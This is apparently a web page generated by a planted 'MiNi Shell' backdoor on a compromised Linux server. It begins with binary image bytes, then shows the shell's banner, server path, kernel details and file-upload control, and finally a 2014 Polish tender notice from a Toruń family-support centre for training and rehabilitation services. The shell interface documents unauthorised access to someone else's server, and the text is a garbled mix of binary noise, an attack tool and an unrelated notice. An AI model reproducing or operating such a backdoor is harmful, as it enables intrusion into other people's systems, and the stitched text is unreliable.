JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140416/84197-N-2014.html

<p class="kh_header"><b>Toruń: Świadczenie usług związanych z wykonaniem zadania, Zorganizowanie i przeprowadzenie zajęć szkoleniowych, warsztatowych oraz turnusu rehabilitacyjnego</b><br>
<b>Numer ogłoszenia: 84197 - 2014; data zamieszczenia: 16.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Towarowa 4-6, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 6628750, faks 56 6628751.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług związanych z wykonaniem zadania, Zorganizowanie i przeprowadzenie zajęć szkoleniowych, warsztatowych oraz turnusu rehabilitacyjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług związanych z wykonaniem zadania,Zorganizowanie i przeprowadzenie zajęć szkoleniowych, warsztatowych oraz turnusu rehabilitacyjnego

                      DZIAŁANIA W RAMACH AKTYWNEJ INTEGRACJI 
Działania w ramach Aktywnej Integracji dla 12 osób niepełnosprawnych poprzez KS:
PAKIET STAŻOWY
Zastosowanie następujących 3 instrumentów aktywnej integracji: 
Łącznie: 185h. bez staży
Staże: śr.3.168h.

INSTRUMENTY AKTYWIZACJI ZAWODOWEJ-31h.
A Warsztaty z doradcą zawodowym cała grupa - 7h.
B Indywidualne doradztwo zawodowe (konsultacje indywidualne) - 2h  os=24h.
INSTRUMENTY AKTYWIZACJI EDUKACYJNEJ  w przypadku uczestnictwa grup
 w 2 szkoleniach  kursach zawodowych - 140h
a  Szkolenia/kursy zawodowe do wyboru
- Sprzedawca z obsługą kasy fiskalnej i obsługą komputera, fakturowanie - 70h.
- Magazynier z obsługą wózka jezdniowego, fakturowanie - 70h.   
INSTRUMENTY AKTYWIZACJI SPOŁECZNEJ- 3.182 h. 
-  Warsztaty integracji i kompetencji społecznych cała grupa - 14h. 
-   STAŻE: śr. 3.168 h.

Na staż zostało skierowanych 12 UP - skrócony czas pracy, 
4h. dziennie   20 tygodniowo x 3 miesiące.
WYMAGANE DOKUMENTY ZE STRONY WYKONAWCY W RAMACH AKTYWNEJ INTEGRACJI Z REALIZACJI BLOKU ZAJĘĆ W RAMACH PAKIETU STAŻOWEGO:
- skierowania na staże
- umowy o organizacje stażu
- opinie z przebiegu stażu
- opinia pracodawcy 
- konspekty
- dzienniki zajęć
- raporty trenera po zakończeniu bloku zajęć
- listy obecności za dany miesiąc
- dokumentacja fotograficzna
- ankiety przed i po zakończeniu kursów/szkoleń
- zaświadczenia o ukończeniu kursów/szkoleń
- certyfikaty

Działania w ramach Aktywnej Integracji dla 6 osób poprzez KS: 
PAKIET AMAZONKI- PROGRAM KOREKCYJNO - EDUKACYJNY
Zastosowanie następujących 4 instrumentów aktywnej integracji: 
Łącznie: 108h.
INSTRUMENTY AKTYWIZACJI SPOŁECZNEJ - 7h
a Warsztaty kompetencji społecznych cała grupa - 7h 
NSTRUMENTY AKTYWIZACJI ZAWODOWEJ - 19h
a Warsztaty z doradcą zawodowym cała grupa -7h
b Indywidualne warsztaty z doradca zawodowym konsultacje indywidualne
 - 2h.os.=12h.
6	INSTRUMENTY AKTYWIZACJI EDUKACYJNEJ - 56h
A  Szkolenie ogólne przygotowujące do prac w administracji - 14h
B  Kurs zawodowy specjalistyczny dla asystenta osoby niepełnosprawnej - 42h
INSTRUMENTY AKTYWIZACJI ZDROWOTNEJ - 26h
A  Wsparcie terapeutyczne warsztaty grupowe - 7h
b Wsparcie psychologiczne (warsztaty grupowe) - 7h
c Indywidualne konsultacje z psychologiem - 2h./ os.= 12h
d Organizacja turnusu rehabilitacyjnego 14 dniowego dla 6 osób niepełnosprawnych, Amazonek:
- teren nadmorski
-czas trwania turnusu: 14 dni pobytowych w terminie I połowa IX.2014 r.
- ośrodek musi być wpisany do rejestru właściwego wojewody, zgodnie z przepisami rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15.11.2007 r. w sprawie turnusów rehabilitacyjnych  Dz.U.nr 230, poz.1694
8	Wykonawca przedstawi listę obecności po zakończeniu turnusu
9	Wykonawca zapewnia uczestnikom:
- Przewóz z wyznaczonego miejsca do miejsca odbywania turnusu oraz z miejsca turnusu po jego zakończeniu do wyznaczonego miejsca (zgodnie z ustawą o transporcie drogowym z dnia 06.09.2001 r.
- Zakwaterowanie w ośrodku w pokojach 1 lub 2 - osobowych z pełnym węzłem sanitarnym  WC, prysznic lub wanna, umywalka, telewizorem i czajnikiem elektrycznym.
- Całodzienne wyżywienie obejmujące : śniadania, obiad i kolację.
- Stałą opiekę pielęgniarską i możliwość korzystania z opieki lekarskiej podczas turnusu.
- Badania lekarskie na początku i na końcu turnusu.
- Ubezpieczenie od następstw nieszczęśliwych wypadków.
- Pokrycie kosztów opłaty klimatycznej.
WYMAGANE DOKUMENTY ZE STRONY WYKONAWCY W RAMACH AKTYWNEJ INTEGRACJI Z REALIZACJI BLOKU ZAJĘĆ W RAMACH PAKIETU AMAZONKI  PROGRAM KOREKCYJNO  EDUKACYJNY:
- raporty trenera po zakończeniu bloku zajęć
- konspekty
- dzienniki zajęć
- listy obecności za dany miesiąc
- dokumentacja fotograficzna
- ankiety przed i po zakończeniu kursów/szkoleń
- zaświadczenia o ukończeniu kursów/szkoleń
- certyfikaty
Działania w ramach Aktywnej Integracji dla 5 osób z rodzin zastępczych poprzez KS
PAKIET MŁODZIEŻOWY
Zastosowanie następujących 3 instrumentów aktywnej integracji: 
Łącznie: 249h.

NSTRUMENTY AKTYWIZACJI SPOŁECZNEJ - 112h
      A Zajęcia profilaktyki uzależnień cała grupa - 2h.
      B Radzenie sobie ze stresem cała grupa zajęcia wyjazdowe z psychologiem tereny rekreacyjne M. Toruń- 8h.
      C  Program psychoedukacyjny  cała grupa - 12h.
      D Terapia krótkoterminowa  Indywidualna terapia dla młodzieży - 12 spotkań  os.
      przez 6 miesięcy, 1 spotkanie 1,5 h 90h
NSTRUMENTY AKTYWIZACJI EDUKACYJNEJ  w przypadku uczestnictwa grup
 w 2 szkoleniach  kursach zawodowych - 120h

a   Szkolenia kursy  zawodowe do wyboru: 
 -    Hotelarsko-gastronomiczny (stand.hoteli na terenie województwa kujawsko-pomorskiego, stan pracy: recepcjonista, barman, pokojowa, szkolenie BHP, ubezpieczenie NNW  -60h.
 -    Pomocnik kucharza z przygotowaniem posiłków fast-food -  na terenie województwa kujawsko-pomorskiego w obiektach gastronomiczno-restauracyjnych szkol. BHP, ubezpieczenie NNW , zasady higieny w procesie produkcji i obrotu żywnością zgodnie z GHP  GMP HACCP, proces produkcji w zakładach gastronomicznych, wyposażenie techniczne w zakładach gastronomicznych z towaroznawstwem, obsługa kasy fiskalnej i urządzeń współpracujących w punktach   gastronomicznych z posiłkami fast - food, zajęcia praktyczne , w tym przygotowywanie posiłków fast - food - 60h.
INSTRUMENTY AKTYWIZACJI ZAWODOWEJ - 17h.
A Warsztaty z doradcą zawodowym cała grupa - 7h
B  Indywidualne doradztwo zawodowe  konsultacje indywidualne - 2h os 10h
WYMAGANE DOKUMENTY ZE STRONY WYKONAWCY W RAMACH AKTYWNEJ INTEGRACJI Z REALIZACJI BLOKU ZAJĘĆ W RAMACH PAKIETU MŁODZIEŻOWEGO:
- konspekty
- dzienniki zajęć
- raporty trenera po zakończeniu bloku zajęć
- listy obecności za dany miesiąc
- dokumentacja fotograficzna
- ankiety przed i po zakończeniu kursów/szkoleń
- zaświadczenia o ukończeniu kursów/szkoleń
- certyfikaty


                          DZIAŁANIA O CHARAKTERZE ŚRODOWISKOWYM
Działania o charakterze środowiskowym dla 5 osób - wychowanków rodzin zastępczych - PAKIET MŁODZIEŻOWY :
A Wyjazd integracyjny, 2 dni  połączony z zajęciami dydaktycznymi  Radzenie sobie ze stresem 1 x 8h. Realizacja w ośrodku wypoczynkowym na terenie województwa kujawsko  pomorskiego, w tym : transport, nocleg, wyżywienie, opiekun, ubezpieczenie uczestników.

Działania o charakterze środowiskowym dla 23 uczestników oraz 12 gości 
A  Zorganizowanie konferencji podsumowującej projekt dla 23 UP oraz 12 gości Realizacja w Sali konferencyjnej hotelu , w tym: transport, poczęstunek.
WYMAGANE DOKUMENTY ZE STRONY WYKONAWCY Z REALIZACJI BLOKÓW  ZAJĘĆ W RAMACH DZIAŁAŃ O CHARAKTERZE ŚRODOWISKOWYM - PAKIETU STAŻOWEGO, PAKIETU MŁODZIEŻOWEGO ORAZ PAKIETU KOREKCYJNO - EDUKACYJNEGO AMAZONKI 
- konspekty
- dzienniki zajęć
- raporty trenera po zakończeniu
- listy obecności 
- dokumentacja fotograficzna
- zaświadczenia
- certyfikaty

  III. PLANOWANE TERMINY REALIZACJI INSTRUMENTÓW AKTYWNEJ  INTEGRACJI 
1  Podpisanie i realizacja KS: V  XI 2014 r. 
2  Organizacja wyjazdu na turnus rehabilitacyjny: I połowa IX.2014 r.


IV. PLANOWANE TERMINY REALIZACJI  DZIAŁAŃ O CHARAKTERZE ŚRODOWISKOWYM:
1 Wyjazd integracyjny dla 5 wychowanków rodzin zastępczych: VIII.2014 r.
2 Konferencja podsumowująca projekt 2014 r. dla 23 UP i 12 gości: XII.2014 r.
 Liczba wszystkich godzin do przeprowadzenia zajęć grupowych i indywidualnych w zakresie aktywnej integracji dla 23 uczestników wynosi łącznie: 542h. w tym: 
A  Instrumenty Aktywizacji Zawodowej - 67h
B  Instrumenty Aktywizacji Edukacyjnej - 316h
C Instrumenty Aktywizacji  Społecznej - 133h
D  Instrumenty Aktywizacji  Zdrowotnej- 26h
Liczba godzin staży  uśredniona  3.168h

DZIAŁANIA W RAMACH AKTYWNEJ INTEGRACJI BĘDĄ SIĘ ODBYWAŁY NA TERENIE MIASTA TORUŃ.

 Liczba wszystkich godzin do przeprowadzenia zajęć grupowych i indywidualnych w zakresie aktywnej integracji dla 23 uczestników wynosi  bez staży 
542 godziny  1 godzina wynosi 45 minut zegarowych
Liczba wszystkich godzin do przeprowadzenia zajęć dydaktycznych  w tracie działań o charakterze środowiskowym dla 5 uczestników Pakiet Młodzieżowy  wynosi:
8 godzin  1 godzina wynosi 45 minut zegarowych


Po stronie Podwykonawcy leży:
1 Zapewnienie dojazdu dla uczestników projektu, zamieszkałych na terenie gmin oraz w przypadkach potrzeby przewozu uczestników podczas realizacji innych zadań poza Toruniem.

2 Ubezpieczenia uczestników NNW w sytuacjach wyjazdów związanych z realizacją projektu oraz podczas szkoleń kursów zawodowych i staży.
3  Catering podczas zajęć , w postaci
A kawy, herbaty 
B dodatków cukier, śmietanka
C wody gazowanej i niegazowanej  soku owocowego
D ciastek kruchych
E  w przypadku zajęć powyżej 6 godzin dziennie  ciepły lunch w postaci zupy z wkładką
lub ziemniaków ze sztuką mięsa i przystawką.
4 Zapewnienie pomieszczeń na terenie Miasta Torunia dostosowanych do prowadzenia zajęć i odpowiednio wyposażonych w sprzęt niezbędny do prawidłowej realizacji zadań, w tym: 
A  Sala  musi posiadać odpowiednią liczbę stanowisk dla uczestników odpowiadającą liczbie osób w grupie, w tym stolik  ławkę z krzesłem umożliwiające swobodne sporządzanie notatek.
B  Pomieszczenie  musi mieć dostęp do zaplecza socjalnego w celu prawidłowej realizacji przerw kawowych i zapewniać odpowiednie warunki sanitarne  dostęp do WC, umywalki z ciepłą i zimną wodą , środków higienicznych w postaci papieru toaletowego , mydła, ręczników papierowych
C Sala musi być wyposażonaie w niezbędny sprzęt w postaci rzutnika multimedialnego, tablicy flipchart z zapasem kartek lub tablicy sucho ścieralnej, ekran projekcyjny, laptop.
D  W przypadku szkoleń/ kursów zawodowych zapewnienie odpowiedniego sprzętu 
i urządzeń współpracujących.

Wymagana kadra do przeprowadzenia wszystkich zajęć:
1.  Psycholog
2. Trener pracy lub doradca zawodowy 
3. Coach - osobisty trener
4. Pielęgniarka
5. Lekarz specjalista według potrzeb
6. Nauczyciel zawodu
7. Terapeuta uzależnień
INNE DANE DOTYCZĄCE WYMAGAŃ WOBEC PODWYKONAWCY:
1Podwykonawca przygotuje:
A  programy zajęć
B  materiały szkoleniowe
C  sporządzi dokumentację zajęć (konspekty, listy obecności, dzienniki zajęć, ankiety przed
 i po zakończeniu kursów szkoleń, dokumentacja z realizacji staży, zaświadczenia, certyfikaty PO KL, protokoły, dokumentację elektroniczno-zdjęciową
d  Catering
e  transport uczestników - w przypadkach tego wymagających
f  ubezpieczenia uczestników;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.Oryginał lub kopia, poświadczona przez Wykonawcę za zgodność z oryginałem
aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.
6. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że
 Wykonawca nie zalega z opłacaniem podatków i opłat,
7.Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne,
8.Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i  osób zdolnych do wykonania zamówienia - w przypadku, gdy Wykonawca nie dysponuje
potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
9.Polisa ubezpieczeniowa od odpowiedzialności cywilnej lub inny dokument potwierdzający ,że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
 działalności na kwotę minimum 30.000, 00 zł lub ewentualnie oświadczenie o zobowiązaniu się do wykupienia polisy w przypadku wyboru złożonej oferty przez Zlecającego.
10. Podpisany zaakceptowany Wzór umowy stanowiący załącznik nr 5 do SIWZ,

11.Propozycja harmonogramu realizacji poszczególnych zadań zgodnie  z przedmiotem
zamówienia.
12).Szczegółowy program zajęć wraz z wykazem osób prowadzących szkolenia oraz dokumentami doświadczającymi posiadanie wymaganych kwalifikacji przez trenerów i  prowadzących.
13.Inne dokumenty: W przypadku, gdy umocowanie do reprezentowania Wykonawcy nie  wynika ze stosowanego dokumentu, a w szczególności z odpisu właściwego rejestru,  zależy załączyć pełnomocnictwo dla osoby upoważnionej do podpisywania oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień,

2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia w wyznaczonym harmonogramem terminie.

3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia.
4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

5. W przypadku składania oferty wspólnej np w formie konsorcjum, o udzielenie
zamówienia mogą ubiegać się Wykonawcy, którzy ponad wyżej wymienione warunki ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia zawarcia umowy w sprawie zamówienia publicznego.

5.2. Ocena spełnienia wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w ust. 6 niniejszej Specyfikacji Istotnych Warunków Zamówienia.

5.3. Z treści złożonych dokumentów i oświadczeń musi jednoznacznie wynikać, iż Wykonawca spełnia wyżej wymienione warunki. Niespełnienie chociażby jednego z wyżej wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, a jego oferta zostanie uznana za odrzuconą.

5.4. Zlecający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub którzy nie złożyli pełnomocnictw albo, którzy złożyli wymagane przez Zlecającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zlecającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowaną usługę wymagań określonych przez Zlecającego, nie później niż w dniu, w którym upłynął termin składania ofert.

5.5.  Zlecający na podstawie art. 36 a, art. 36 b ustawy Prawo zamówień publicznych żąda od Wykonawcy wskazania na Formularzu oferty części zamówienia, której wykonanie powierzy podwykonawcom.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień,

2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia w wyznaczonym harmonogramem terminie.

3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia.
4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

5.W przypadku składania oferty wspólnej np. w formie konsorcjum, o udzielenie
zamówienia mogą ubiegać się Wykonawcy, którzy ponad wyżej wymienione warunki ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia zawarcia umowy w sprawie zamówienia publicznego.

5.2. Ocena spełnienia wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia  nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w ust. 6 niniejszej Specyfikacji Istotnych Warunków Zamówienia.

5.3. Z treści złożonych dokumentów i oświadczeń musi jednoznacznie wynikać, iż Wykonawca spełnia wyżej wymienione warunki. Niespełnienie chociażby jednego z wyżej wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, a jego oferta zostanie uznana za odrzuconą.

5.4. Zlecający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub którzy nie złożyli pełnomocnictw albo, którzy złożyli wymagane przez Zlecającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zlecającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowaną usługę wymagań określonych przez Zlecającego, nie później niż w dniu, w którym upłynął termin składania ofert.

5.5.  Zlecający na podstawie art. 36 a, art. 36 b ustawy Prawo zamówień publicznych żąda od Wykonawcy wskazania na Formularzu oferty części zamówienia, której wykonanie powierzy podwykonawcom.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień,

2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia w wyznaczonym harmonogramem terminie.

3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia.
4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

5. W przypadku składania oferty wspólnej np. w formie konsorcjum, o udzielenie
zamówienia mogą ubiegać się Wykonawcy, którzy ponad wyżej wymienione warunki ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia zawarcia umowy w sprawie zamówienia publicznego.

5.2. Ocena spełnienia wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia  nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w ust. 6 niniejszej Specyfikacji Istotnych Warunków Zamówienia.

5.3. Z treści złożonych dokumentów i oświadczeń musi jednoznacznie wynikać, iż Wykonawca spełnia wyżej wymienione warunki. Niespełnienie chociażby jednego z wyżej wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, a jego oferta zostanie uznana za odrzuconą.

5.4. Zlecający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub którzy nie złożyli pełnomocnictw albo, którzy złożyli wymagane przez Zlecającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zlecającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowaną usługę wymagań określonych przez Zlecającego, nie później niż w dniu, w którym upłynął termin składania ofert.

5.5.  Zlecający na podstawie art. 36 a, art. 36 b ustawy Prawo zamówień publicznych żąda od Wykonawcy wskazania na Formularzu oferty części zamówienia, której wykonanie powierzy podwykonawcom.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień,

2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia w wyznaczonym harmonogramem terminie.

3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia.
4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

